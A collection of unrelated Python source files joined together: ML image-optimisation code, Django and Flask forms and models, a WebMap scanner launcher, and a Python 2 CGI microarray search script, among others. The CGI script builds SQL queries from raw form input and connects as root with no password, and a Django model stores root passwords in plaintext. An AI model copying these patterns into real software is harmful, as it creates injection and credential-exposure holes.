edge_true_positive = (batch.y.bool() & cut_list).sum().float()
self.log_dict({
'eff': torch.tensor(edge_true_positive/edge_true),
'pur': torch.tensor(edge_true_positive/edge_positive)}) |
from torch import optim, nn
from pytti.Notebook import tqdm
from pytti import *
import pandas as pd
import math
from labellines import labelLines
def unpack_dict(D, n = 2):
ds = [{k:V[i] for k,V in D.items()} for i in range(n)]
return tuple(ds)
import pandas as pd
from scipy.signal import savgol_filter
def smooth_dataframe(df, window_size):
"""applies a moving average filter to the columns of df"""
smoothed_df = pd.DataFrame().reindex_like(df)
for key in df.columns:
smoothed_df[key] = savgol_filter(df[key], window_size, 2, mode='nearest')
return smoothed_df
class DirectImageGuide():
"""
Image guide that uses an optimizer and torch autograd to optimize an image representation
Based on the BigGan+CLIP algorithm by advadnoun (https://twitter.com/advadnoun)
image_rep: (DifferentiableImage) image representation
embedder: (Module) image embedder
optimizer: (Class) optimizer class to use. Defaults to Adam
all other arguments are passed as kwargs to the optimizer.
"""
def __init__(self, image_rep, embedder, optimizer = None, lr = None, **optimizer_params):
self.image_rep = image_rep
self.embedder = embedder
if lr is None:
lr = image_rep.lr
optimizer_params['lr']=lr
self.optimizer_params = optimizer_params
if optimizer is None:
self.optimizer = optim.Adam(image_rep.parameters(), **optimizer_params)
else:
self.optimizer = optimizer
self.dataframe = []
def run_steps(self, n_steps,
prompts, interp_prompts, loss_augs,
stop = -math.inf, interp_steps = 0,
i_offset = 0, skipped_steps = 0):
"""
runs the optimizer
prompts: (ClipPrompt list) list of prompts
n_steps: (positive integer) steps to run
returns: the number of steps run
"""
for i in tqdm(range(n_steps)):
self.update(i+i_offset, i+skipped_steps)
losses = self.train(i+skipped_steps,
prompts, interp_prompts, loss_augs,
interp_steps = interp_steps)
if losses['TOTAL'] <= stop:
break
return i+1
def set_optim(self, opt = None):
if opt is not None:
self.optimizer = opt
else:
self.optimizer = optim.Adam(self.image_rep.parameters(), **self.optimizer_params)
def clear_dataframe(self):
self.dataframe = []
def plot_losses(self, axs):
def plot_dataframe(df, ax, legend = False):
keys = list(df)
keys.sort(reverse=True, key = lambda k:df[k].iloc[-1])
ax.clear()
df[keys].plot(ax=ax, legend = legend)
if(legend):
ax.legend(bbox_to_anchor=(1.04,1), loc="upper left")
ax.tick_params(labelbottom=True, labeltop=False, labelleft=True, labelright=False,
bottom=True, top=False, left=True, right=False)
last_x = df.last_valid_index()
lines = ax.get_lines()
colors = [l.get_color() for l in lines]
labels = [l.get_label() for l in lines]
ax.relim()
ax.autoscale_view()
labelLines(ax.get_lines(), align = False)
return dict(zip(labels, colors))
dfs = self.dataframe[:]
if dfs != []:
dfs[0] = smooth_dataframe(dfs[0], 17)
for i,(df,ax) in enumerate(zip(dfs,axs)):
if len(df.index) < 2:
return False
#m = df.apply(lambda col: col.first_valid_index())
#print(m)
#print(df.lookup(m, m.index))
#rel_loss = (df-df.lookup(m, m.index))
if not df.empty:
plot_dataframe(df, ax, legend = i == 0)
ax.set_ylabel('Loss')
ax.set_xlabel('Step')
return True
def update(self, i, stage_i):
"""
update hook called ever step
"""
pass
def train(self, i, prompts, interp_prompts, loss_augs, interp_steps = 0, save_loss = True):
"""
steps the optimizer
promts: (ClipPrompt list) list of prompts
"""
self.optimizer.zero_grad()
z = self.image_rep.decode_training_tensor()
losses = []
if self.embedder is not None:
image_embeds, offsets, sizes = self.embedder(self.image_rep, input = z)
if i < interp_steps:
t = i/interp_steps
interp_losses = [prompt(format_input(image_embeds, self.embedder, prompt),
format_input(offsets, self.embedder, prompt),
format_input(sizes, self.embedder, prompt))[0]*(1-t) for prompt in interp_prompts]
else:
t = 1
interp_losses = [0]
prompt_losses = {prompt:prompt(format_input(image_embeds, self.embedder, prompt),
format_input(offsets, self.embedder, prompt),
format_input(sizes, self.embedder, prompt)) for prompt in prompts}
aug_losses = {aug:aug(format_input(z, self.image_rep, aug), self.image_rep) for aug in loss_augs}
image_augs = self.image_rep.image_loss()
image_losses = {aug:aug(self.image_rep) for aug in image_augs}
#aug_losses.update(image_losses)
losses, losses_raw = zip(*map(unpack_dict, [prompt_losses,aug_losses,image_losses]))
losses = list(losses)
losses_raw = list(losses_raw)
for v in prompt_losses.values():
v[0].mul_(t)
total_loss = sum(map(lambda x:sum(x.values()),losses)) + sum(interp_losses)
losses_raw.append({'TOTAL':total_loss})
total_loss.backward()
self.optimizer.step()
self.image_rep.update()
#if t != 0:
# for v in prompt_losses.values():
# v[0].div_(t)
if save_loss:
if not self.dataframe:
self.dataframe = [pd.DataFrame({str(k):float(v) for k,v in loss.items()}, index=[i]) for loss in losses_raw]
for df in self.dataframe:
df.index.name = 'Step'
else:
for j,(df,loss) in enumerate(zip(self.dataframe,losses_raw)):
self.dataframe[j] = df.append(pd.DataFrame({str(k):float(v) for k,v in loss.items()}, index=[i]), ignore_index=False)
self.dataframe[j].name = 'Step'
return {'TOTAL':float(total_loss)}
|
""" BasicTextAnalyzer Information """
__author__ = "James Morris"
__maintainer__ = "James Morris"
__email__ = "morrisjamesharry@gmail.com"
__license__ = "MIT"
__version__ = "0.0.1"
__credits__ = ["Tyler Barrus and Peter Norvig (for pyspellchecker"]
__url__ = "https://github.com/morrisjh/Basic-Text-Analyzer"
|
import datetime
from captcha.fields import CaptchaField
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from django import forms
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from haystack.forms import SearchForm
from .models import Resource, Assembly
class PublicationForm(forms.Form):
name = forms.CharField(max_length=100)
type = forms.CharField(max_length=100)
start_date = forms.DateField()
end_date = forms.DateField()
def clean(self):
cleaned_data = super(PublicationForm, self).clean()
start_date = cleaned_data.get("start_date")
end_date = cleaned_data.get("end_date")
if start_date and end_date and (start_date > end_date):
self._errors['start_date'] = self._errors.get('start_date', [])
self._errors['start_date'].append("Start date must be before end date.")
return cleaned_data
class SignUpForm(UserCreationForm):
first_name = forms.CharField(max_length=30, required=False, help_text='Optional.')
last_name = forms.CharField(max_length=30, required=False, help_text='Optional.')
email = forms.EmailField(max_length=254, help_text='Required. Inform a valid email address.')
class Meta:
model = User
fields = ('username', 'first_name', 'last_name', 'email', 'password1', 'password2',)
class AllauthSignupForm(forms.Form):
captcha = CaptchaField()
def signup(self, request, user):
""" Required, or else it throws deprecation warnings """
pass
|
#!/usr/bin/env python3
#
# Copyright (c) 2021 Iliass Alami Qammouri
#
# This is free software, licensed under the MIT License.
# See /LICENSE for more information.
#
import os
import sys
import socket
import string
import requests
#import argparse
from art import *
from termcolor import colored
from modules.dirsearchscan import dirsearchScan
from modules.niktoscan import niktoScan
from modules.nmapscan import nmapScan
from modules.fullscan import fullScan
from modules.exit import exit
ans = True
version = '1.0.5'
home = os.path.expanduser("~")
def reOpen():
installed = True if os.path.exists("/bin/webmap") else False
if installed:
os.system("sudo webmap")
sys.exit()
else:
os.system("sudo python3 webmap.py")
sys.exit(())
def clear():
os.system('cls' if os.name == 'nt' else 'clear')
def createDir(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def notValid(func, var, num=1) :
num = True
if num == True :
if len(var) <= 5 :
clear()
print(colored("\nNot Valid Choice Try again\n", 'red', attrs=['reverse']))
func()
else :
clear()
print(colored("\nNot Valid Choice Try again\n", 'red', attrs=['reverse']))
func()
def dirOutput(var, path, url) :
if len(var) == 0 :
var = path +"/"+ url
return var
def callFunc(func, num=1) :
if num == True :
clear()
ans = True
while ans:
func()
else:
clear()
func()
def verCheck():
verUrl = 'https://raw.githubusercontent.com/Anteste/WebMap/master/conf/version.txt'
try:
verRqst = requests.get(verUrl)
verSc = verRqst.status_code
if verSc == 200:
githubVer = verRqst.text
githubVer = githubVer.strip()
if version == githubVer:
print(colored(f"Your WebMap version is Up-To-Date\n",'yellow', attrs=['reverse']))
else:
print(colored(f"Your WebMap version is Out-Dated, New Version Available: {format(githubVer)} \n",'red', attrs=['reverse']))
else:
print('[ Status : {} '.format(verSc) + ']' + '\n')
except Exception as e:
print('\n' + '[-] Exception : ' + str(e)) |
import numpy
import cv2
import requests
import sys
import os.path
import socket
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class exit_codes:
EX_OK = 0
EX_USAGE = 64
EX_NOINPUT = 66
EX_TIMEOUT = 124
EX_GENERIC = 1
class server_addresses:
DEFAULT = "http://wewewew.com/apirest"
def checkArguments(arguments):
if len(arguments) != 3:
print(bcolors.FAIL,
"Image missing and / or degree of distortion argument missing. \n",
bcolors.HEADER,
"Example:",
bcolors.OKBLUE,
"python3", arguments[0], "[image_path] [distortion_degree]",
bcolors.ENDC)
sys.exit(exit_codes.EX_USAGE)
def checkFile(file):
if not os.path.isfile(file):
print(bcolors.FAIL,
"Image missing:\n",
bcolors.WARNING,
file,
bcolors.ENDC)
sys.exit(exit_codes.EX_NOINPUT)
def checkDistortion(distortion):
distortion = int(distortion) if distortion.isnumeric() else None
if distortion is None or distortion < 1 or (distortion % 2) == 0:
print(bcolors.FAIL,
"Distortion degree is incorrect: \n",
bcolors.HEADER,
"The distortion degree must be greater than 0 and an odd number.",
bcolors.ENDC)
sys.exit(exit_codes.EX_USAGE)
def gaussianBlurProcess(image, distortion):
return cv2.GaussianBlur(
image, (distortion, distortion), cv2.BORDER_DEFAULT)
def sendBinaryData(path_data, camNumber):
timeoutTime = 30
file = {
'media': open(path_data, 'rb'),
}
values = {
'camname': socket.gethostname()
}
try:
response = requests.post(server_addresses.DEFAULT,
files=file, data=values, timeout=timeoutTime)
response.raise_for_status()
except requests.exceptions.HTTPError as errh:
print("Http Error:", errh)
except requests.exceptions.ConnectionError as errc:
print("Error Connecting:", errc)
except requests.exceptions.Timeout as errt:
print("Timeout Error:", errt)
except requests.exceptions.RequestException as err:
print("Oops: Something Else", err)
def main():
# Checks the arguments, and inputs.
checkArguments(sys.argv)
checkFile(sys.argv[1])
checkDistortion(sys.argv[2])
# Save the arguments on variables for easier handling.
imagePath = sys.argv[1]
distortion = int(sys.argv[2])
# Load the image.
binaryImage = cv2.imread(imagePath)
# Process the image.
processedBinaryImage = gaussianBlurProcess(binaryImage, distortion)
# Save the processed image on the same path, overwritting the original image.
cv2.imwrite(imagePath, processedBinaryImage)
# Sends the processed image to the data-analisys system. ( URL pending ).
# sendBinaryData(imagePath)
# Good bye, have a great day!
sys.exit(exit_codes.EX_OK)
main()
|
from django.contrib import admin
from .models import (IP)
# Register your models here.
admin.site.register(IP)
|
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, BooleanField
from wtforms.validators import DataRequired, Length, Email, EqualTo, ValidationError
class formURL(FlaskForm):
site = StringField('Site URL', validators=[DataRequired()])
keyword = StringField('Label Keyword', validators=[Length(max=35)])
submit = SubmitField('Submit') |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
# Create your models here.
# 用户
class Users(models.Model):
id = models.AutoField(primary_key=True)
username = models.CharField(max_length=50)
password = models.CharField(max_length=50)
# 全部主机
class Servers(models.Model):
host_id = models.AutoField(primary_key=True)
ip = models.CharField(max_length=50)
hostname = models.CharField(max_length=50)
root_password = models.CharField(max_length=50)
host_type = models.CharField(max_length=50, default='servers')
# 初始化服务器状态
class InitServer(models.Model):
id = models.AutoField(primary_key=True)
server_list = models.CharField(max_length=500)
create_time = models.DateTimeField(auto_now_add=True)
status = models.CharField(max_length=50, default=None, null=True)
# 主机
class Hosts(models.Model):
host_id = models.AutoField(primary_key=True)
ip = models.CharField(max_length=50)
hostname = models.CharField(max_length=50)
srv_type = models.CharField(max_length=50)
def __str__(self):
return self.hostname
# yum仓库
class Repository(models.Model):
repo_id = models.AutoField(primary_key=True)
ip = models.CharField(max_length=50)
port = models.CharField(max_length=10)
# 数据库
class Databases(models.Model):
db_id = models.AutoField(primary_key=True)
srv_type = models.CharField(max_length=50)
db_type = models.CharField(max_length=20)
root_password = models.CharField(max_length=20)
srv_password = models.CharField(max_length=20)
# 任务
class Tasks(models.Model):
task_id = models.AutoField(primary_key=True)
srv_type = models.CharField(max_length=50)
host_list = models.CharField(max_length=500)
host_id = models.CharField(max_length=500)
create_time = models.DateTimeField(auto_now_add=True)
task_status = models.CharField(max_length=50, default='NewTask')
# 安装业务类型
class Services(models.Model):
service = models.CharField(max_length=50)
is_db = models.BooleanField(default=False)
db_type = models.CharField(max_length=20, null=True)
|
#! c:/Python27/python.exe
#This is the script for GO term search
import cgi, MySQLdb, subprocess, os, random
os.environ['HOME']='c:\Apache\htdocs'
os.environ['MPLCONFIGDIR']='c:\Apache\htdocs'
import matplotlib
matplotlib.use('Agg')
import numpy
import matplotlib.pyplot as plt
import matplotlib.figure
import pylab
def process():
form=cgi.FieldStorage()
go1=form.getfirst('genefunction1')
gosearch1=form.getfirst('gfsearch1')
go2=form.getfirst('genefunction2')
gosearch2=form.getfirst('gfsearch2')
go3=form.getfirst('genefunction3')
gosearch3=form.getfirst('gfsearch3')
exp1=form.getvalue('exp1')
expsearch1=form.getfirst('expsearch1')
exp2=form.getvalue('exp2')
expsearch2=form.getfirst('expsearch2')
exp3=form.getvalue('exp3')
expsearch3=form.getfirst('expsearch3')
filename='result.png'
f=open('supercluster.txt','r')
rows=[i.split('\t') for i in f.readlines()]
f.close()
for i in range(len(rows)):
for j in range(len(rows[i])):
rows[i][j]=float(rows[i][j])
if go1=="1" and go2=="1" and go3=="1" and exp1=="1" and exp2=="1" and exp3 == "1":
print 'Content-type: text/html'
print
print '<html><head>'
print '<title>Arabdopsis Athaliana Microarray Data Browser</title>'
print '</head>'
print '<body>'
print '<form action="ath.html">'
print '<div id="topbanner">'
print '<h1>Welcome to Arabidopsis Athaliana Microarray Database!</h1>'
print '</div>'
print '<div id="mainbody">'
print '<table cellpadding=5 style="border-color:black;border-style:solid;border-width:thin" width="1000" align="center">'
print '<tbody>'
print '<tr><td>'
print '<h2>Please do not leave the query area blank</h2>'
print '</td></tr>'
print '</tbody>'
print '</table>'
print '</div>'
print '</form>'
print '</body>'
print '</html>'
else:
db=MySQLdb.connect(host="localhost",user='root',passwd='')
c=db.cursor()
c.execute('use athaliana')
id_gene=[]
dataid_exp=[]
result_gene=[]
result_exp=[]
result_value=[]
if go1=="1":
id_gene1=()
elif go1=="2":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) use index (daindex,daindex_id) where DATypeID=3 and DAValue like "%s"'%('%'+gosearch1+'%'))
temp=c.fetchall()
id_gene1=[i[0] for i in temp]
id_gene1=tuple(id_gene1)
elif go1=="3":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=4 and DAValue="%s"'%('%'+gosearch1+'%'))
temp=c.fetchall()
id_gene1=[i[0] for i in temp]
id_gene1=tuple(id_gene1)
elif go1=="4":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=5 and DAValue="%s"'%('%'+gosearch1+'%'))
temp=c.fetchall()
id_gene1=[i[0] for i in temp]
id_gene1=tuple(id_gene1)
if go2=="1":
id_gene2=()
elif go2=="2":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=3 and DAValue="%s"'%('%'+gosearch2+'%'))
temp=c.fetchall()
id_gene2=[i[0] for i in temp]
id_gene2=tuple(id_gene2)
elif go2=="3":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=4 and DAValue="%s"'%('%'+gosearch2+'%'))
temp=c.fetchall()
id_gene2=[i[0] for i in temp]
id_gene2=tuple(id_gene2)
elif go2=="4":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=5 and DAValue="%s"'%('%'+gosearch2+'%'))
temp=c.fetchall()
id_gene2=[i[0] for i in temp]
id_gene2=tuple(id_gene2)
if go3=="1":
id_gene3=()
elif go3=="2":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=3 and DAValue="%s"'%('%'+gosearch3+'%'))
temp=c.fetchall()
id_gene3=[i[0] for i in temp]
id_gene3=tuple(id_gene3)
elif go3=="3":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=4 and DAValue="%s"'%('%'+gosearch3+'%'))
temp=c.fetchall()
id_gene3=[i[0] for i in temp]
id_gene3=tuple(id_gene3)
elif go3=="4":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=5 and DAValue="%s"'%('%'+gosearch3+'%'))
temp=c.fetchall()
id_gene3=[i[0] for i in temp]
id_gene3=tuple(id_gene3)
id_gene=id_gene1+id_gene2+id_gene3
id_gene=set(id_gene)
id_gene=list(id_gene)
if go1=="1" and go2=="1" and go3=="1" and (exp1!=1 or exp2!=1 or exp3!=1):
c.execute('select DataID from Data where DTypeID=1')
temp=c.fetchall()
id_gene=[i[0] for i in temp]
for i in id_gene:
c.execute('select DataName from Data use index (dataidindex) where DataID="%s"'%i)
result_gene.append(c.fetchall()[0][0])
if exp1=="1":
id_exp1=()
elif exp1=="2":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=6 and DAValue like "%s"'%('%'+expsearch1+'%'))
temp=c.fetchall()
id_exp1=[i[0] for i in temp]
id_exp1=tuple(id_exp1)
elif exp1=="3":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=7 and DAValue like "%s"'%('%'+expsearch1+'%'))
temp=c.fetchall()
id_exp1=[i[0] for i in temp]
id_exp1=tuple(id_exp1)
elif exp1=="4":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=9 and DAValue like "%s"'%('%'+expsearch1.upper()+'%'))
temp=c.fetchall()
id_exp1=[i[0] for i in temp]
id_exp1=tuple(id_exp1)
if exp2=="1":
id_exp2=()
elif exp2=="2":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=6 and DAValue like "%s"'%('%'+expsearch2+'%'))
temp=c.fetchall()
id_exp2=[i[0] for i in temp]
id_exp2=tuple(id_exp2)
elif exp2=="3":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=7 and DAValue like "%s"'%('%'+expsearch2+'%'))
temp=c.fetchall()
id_exp2=[i[0] for i in temp]
id_exp2=tuple(id_exp2)
elif exp2=="4":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=9 and DAValue like "%s"'%('%'+expsearch2.upper()+'%'))
temp=c.fetchall()
id_exp2=[i[0] for i in temp]
id_exp2=tuple(id_exp2)
if exp3=="1":
id_exp3=()
elif exp3=="2":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=6 and DAValue like "%s"'%('%'+expsearch3+'%'))
temp=c.fetchall()
id_exp3=[i[0] for i in temp]
id_exp3=tuple(id_exp3)
elif exp3=="3":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=7 and DAValue like "%s"'%('%'+expsearch3+'%'))
temp=c.fetchall()
id_exp3=[i[0] for i in temp]
id_exp3=tuple(id_exp3)
elif exp3=="4":
c.execute('select DataID from DAttribute use index (daindex,daindex_id) where DATypeID=9 and DAValue like "%s"'%('%'+expsearch3.upper()+'%'))
temp=c.fetchall()
id_exp3=[i[0] for i in temp]
id_exp3=tuple(id_exp3)
id_exp=id_exp1+id_exp2+id_exp3
id_exp=set(id_exp)
id_exp=list(id_exp)
if exp1=="1" and exp2=="1" and exp3=="1" and (go1!="1" or gp2!="1" or go3!="1"):
c.execute('select DataID from Data where DTypeID=2')
temp=c.fetchall()
id_exp=[i[0] for i in temp]
for i in id_exp:
c.execute('select DataName from Data use index (dataidindex) where DataID="%s"'%i)
temp=c.fetchall()
result_exp.append(temp[0])
id_exp=[i-22810-1 for i in id_exp]
if len(result_gene)!=0:
for i in id_gene:
temp_pergene=[]
temp=numpy.array(rows[(int(i)-1)])
temp=list(temp[id_exp])
result_value.append(temp)
db.commit()
os.chdir('c:\Apache\htdocs')
os.system('del result.txt')
os.system('type NUL > result.txt')
line_exp=[str(i)[2:-3] for i in result_exp]
line_gene=[str(i) for i in result_gene]
header=['ProbeID']+line_exp
f=open('result.txt','a')
f.writelines(header)
for i in range(len(line_gene)):
for j in range(len(result_value[i])):
if result_value[i][j]=='-50':
result_value[i][j]=='N/A'
lines=[line_gene[i]]+result_value[i]
lines=[str(j) for j in lines]
f.writelines('\t'.join(lines))
f.close()
print 'Content-type: text/html'
print
print '<html><head>'
print '<title>Arabdopsis Athaliana Microarray Data Browser</title>'
print '</head>'
print '<body>'
print '<div id="topbanner">'
print '<form action="index.py">'
print '<h1>Here are your results</h1>'
print '<h2>Or, you may re-modify your search</h2>'
print '<input type="submit" value="Try again">'
print '</form>'
print '<h3>For downloadable text file, right click on the following link and select "Save link as..."</h3>'
print '<a href="/result.txt" target="_blank">Download</a>'
print '</div>'
print '<div id="mainbody">'
print '<table border="1">'
print '<tbody>'
print '<tr><td width="500px"><b>Probe ID</b></td>'
for i in result_exp:
print '<td width="500px">'
print '<a href="expsearch.py?expname=%s">'%i[0]
print '<b>%s</b></a></td>'%i[0]
print '''</tr>'''
for i in range(len(result_gene)):
print '''<tr><td width="500px"><a href="gene.py?genename=%s" target="_blank">%s</td>'''%(result_gene[i],result_gene[i])
for j in range(len(result_exp)):
print '''<td width="500px">%s</td>'''%result_value[i][j]
print '''</tr>'''
print '</tbody>'
print '</table>'
print '</div>'
print '</body>'
print '</html>'
else:
print 'Content-type: text/html'
print
print '<html><head>'
print '<title>Arabdopsis Athaliana Microarray Data Browser</title>'
print '</head>'
print '<body>'
print '<div id="topbanner">'
print '<form action="ath.htm">'
print '<h1>Here are your results</h1>'
print '<h2>Or, you may re-modify your search</h2>'
print '<input type="submit" value="Try again">'
print '</form>'
print '</div>'
print '<div id="mainbody">'
print '<table width="800px">'
print '<tbody>'
print '<tr><td>No result found</td></tr>'
print '</tbody>'
print '</table>'
print '</div>'
print '</body>'
print '</html>'
if __name__=="__main__":
process()
|
# -*- coding: utf-8 -*-
import math
from typing import Callable, Tuple
import numpy
import scipy.optimize # type: ignore
from optimizer._internals.common import typing
from optimizer._internals.common.linneq import constraint_check
from optimizer._internals.common.norm import norm_l2, safe_normalize
from optimizer._internals.quad_prog import status
from optimizer._internals.quad_prog.circular_interp import circular_interp
from optimizer._internals.quad_prog.clip_solution import clip_solution
from optimizer._internals.quad_prog.quad_eval import QuadEvaluator
from overloads import bind_checker, dyn_typing
from overloads.shortcuts import assertNoInfNaN, assertNoInfNaN_float
from overloads.typedefs import ndarray
Flag = status.Flag
Status = status.Status
_eps = float(numpy.finfo(numpy.float64).eps)
def no_check_QPeval(_: QuadEvaluator) -> None:
pass
def no_check_Flag(_: Flag) -> None:
pass
@bind_checker.bind_checker_2(
input=bind_checker.make_checker_2(no_check_QPeval, assertNoInfNaN_float),
output=bind_checker.make_checker_2(assertNoInfNaN, no_check_Flag),
)
def _implimentation(qpval: QuadEvaluator, delta: float) -> Tuple[ndarray, Flag]:
g, H = qpval.g, qpval.H
if norm_l2(g) < math.sqrt(_eps):
return -g, Flag.INTERIOR
e: ndarray
v: ndarray
e, v = numpy.linalg.eigh(H)
min_lambda = float(e.min())
vg: ndarray = -g @ v
s: ndarray
if min_lambda > 0:
s = v @ (vg / e)
if norm_l2(s) <= delta:
return s, Flag.INTERIOR
flag: Flag = Flag.BOUNDARY
def secular(lambda_: float) -> float:
if min_lambda + lambda_ <= 0:
return 1 / delta
alpha: ndarray = vg / (e + lambda_)
return (1 / delta) - (1 / norm_l2(alpha))
def init_guess() -> Tuple[float, float]:
a = -min_lambda if min_lambda < 0 else 0
assert secular(a) >= 0
dx = a / 2
if not a:
dx = 1 / 2
while secular(a + dx) > 0:
dx *= 2
return (a, a + dx)
lambda_ = scipy.optimize.brentq(
secular, *init_guess(), maxiter=2 ** 31 - 1, disp=False
)
e = e + lambda_
assert not numpy.any(e < 0)
if numpy.any(e == 0):
flag = Flag.FATAL
e[e == 0] = _eps
s = v @ (vg / e)
return delta * safe_normalize(s), flag
def _pcg_output_check(output: Status) -> None:
pass
N = dyn_typing.SizeVar()
assertNoInfNaN_proj: Callable[[typing.proj_t], None] = assertNoInfNaN
@dyn_typing.dyn_check_4(
input=(
dyn_typing.Class(QuadEvaluator),
typing.DynT_Constraints(N),
dyn_typing.Float(),
dyn_typing.NDArray(numpy.float64, (N, N)),
),
output=dyn_typing.Class(Status),
)
@bind_checker.bind_checker_4(
input=bind_checker.make_checker_4(
no_check_QPeval,
constraint_check,
assertNoInfNaN_float,
assertNoInfNaN_proj,
),
output=_pcg_output_check,
)
def quad_prog(
qpval: QuadEvaluator,
constraints: typing.constraints_t,
delta: float,
proj: typing.proj_t,
) -> Status:
g, H = qpval.g, qpval.H
d, flag = _implimentation(qpval, delta)
x_interp = circular_interp(proj @ -g, proj @ d)
x_clip, violate, index = clip_solution(x_interp, g, H, constraints, delta)
angle = index / (x_interp.shape[1] - 1)
if violate:
flag = Flag.CONSTRAINT
return status.make_status(x_clip, angle, flag, delta, qpval)
|
# Copyright (c) 2017-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
"""Environment helper functions."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import sys
# Default value of the CMake install prefix
_CMAKE_INSTALL_PREFIX = '/usr/local'
def get_runtime_dir():
"""Retrieve the path to the runtime directory."""
return os.getcwd()
def get_py_bin_ext():
"""Retrieve python binary extension."""
return '.py'
def set_up_matplotlib():
"""Set matplotlib up."""
import matplotlib
# Use a non-interactive backend
matplotlib.use('Agg')
def exit_on_error():
"""Exit from a detectron tool when there's an error."""
sys.exit(1)
|
import sys
import logging as log
from Bio import Entrez
from urllib.error import HTTPError
from .data_models import Taxon
def fetch_taxonomic_info(user_email: str, taxon: Taxon, retries: int) -> None:
"""Receives a Taxon object and tries to fetch its full taxonomic classification information
Parameters:
user_email (string): A valid email provided by the user and used for Entrez.email
taxon (object): A Taxon object that will hold the fetched information and provide the input
information
retries (int): The maximum number of retries after an unsuccsessful fetch attempt
Returns:
None
"""
Entrez.email = user_email
Entrez.max_tries = retries
Entrez.sleep_between_tries = 15
taxon.classification = {}
try:
query = Entrez.efetch(db="taxonomy", id=taxon.taxon_id, retmode="xml")
parsed = Entrez.read(query)
taxonomic_info = parsed[0]["LineageEx"]
for taxon_level in taxonomic_info:
if taxon_level["Rank"] == "no rank":
if "no rank" not in list(taxon.classification):
taxon.classification[taxon_level["Rank"]] = []
taxon.classification[taxon_level["Rank"]].append(
taxon_level["ScientificName"])
else:
taxon.classification[taxon_level["Rank"]
] = taxon_level["ScientificName"]
except (KeyboardInterrupt):
log.warning("\nQUIT: TaIGa was stopped by the user\n")
sys.exit()
except (HTTPError):
log.warning("\nWARNING: Connection error while trying to fetch the taxonomic information "
f"for {taxon.name}. It could be due to a lack of internet connection or a broken response "
"from the NCBI servers. Ignoring this taxon for now")
taxon.missing_classification = True
except (IndexError):
log.warning("\nWARNING: Couldn't find the taxonomic information for "
f"organism '{taxon.name}'")
taxon.missing_classification = True
except (Exception):
log.warning("\nWARNING: Unknown error occurred while trying to fetch the taxonomic "
f"information for organism '{taxon.name}'. It could be due to TaIGa reaching the maximum "
"number of retries or issues with the NCBI servers. Maybe wait and try again a "
"bit later")
taxon.missing_classification = True
def fetch_correct_spelling(user_email: str, taxon: Taxon, retries: int) -> None:
"""Receives a Taxon object and tries to fetch a correct name for it from NCBI
Parameters:
user_email (string): A valid email provided by the user and used for Entrez.email
taxon (object): A Taxon object that will hold the fetched information and provide the input
information
retries (int): The maximum number of retries after an unsuccsessful fetch attempt
Returns:
None
"""
Entrez.email = user_email
Entrez.max_tries = retries
Entrez.sleep_between_tries = 15
try:
query = Entrez.espell(db="taxonomy", term=taxon.name)
parsed = Entrez.read(query)
corrected_name = parsed["CorrectedQuery"]
if (len(corrected_name) == 0):
log.warning(
f"\nWARNING: Couldn't find the correct organism name for '{taxon.name}'")
taxon.missing_corrected = True
else:
taxon.name = corrected_name
except (KeyboardInterrupt):
log.warning("\nQUIT: TaIGa was stopped by the user\n")
sys.exit()
except (RuntimeError):
log.warning(
f"\nWARNING: Couldn't find the correct organism name for '{taxon.name}'")
taxon.missing_corrected = True
except (Exception):
log.warning("\nWARNING: Unknown error occurred while trying to correct the spelling for "
f"organism '{taxon.name}'")
taxon.missing_corrected = True
def fetch_id_from_name(user_email: str, db: str, taxon: Taxon, retries: int) -> None:
"""Fetches either the Taxon ID or the Genome ID for a Taxon object, using the taxon's name
Parameters:
user_email (string): A valid email provided by the user and used for Entrez.email
db (string): The database the function should try to fetch the information from. If the value
is 'genome', it will search Genome for a Genome ID. If it is 'taxonomy', it will
search Taxonomy for a Taxon ID
taxon (object): A Taxon object that will hold the fetched information and provide the input
information
retries (int): The maximum number of retries after an unsuccsessful fetch attempt
Returns:
None
"""
Entrez.email = user_email
Entrez.max_tries = retries
Entrez.sleep_between_tries = 15
if not taxon.missing_name:
query = Entrez.esearch(db=db, term=taxon.name, retmode="xml")
parsed = Entrez.read(query)
if db == "taxonomy":
try:
taxon_id = parsed["IdList"][0]
taxon.taxon_id = int(taxon_id)
except (KeyboardInterrupt):
log.warning("\nQUIT: TaIGa was stopped by the user\n")
sys.exit()
except (IndexError):
log.warning(
f"\nWARNING: Couldn't find a valid Taxon ID for the organism '{taxon.name}'")
taxon.missing_taxon_id = True
except (Exception):
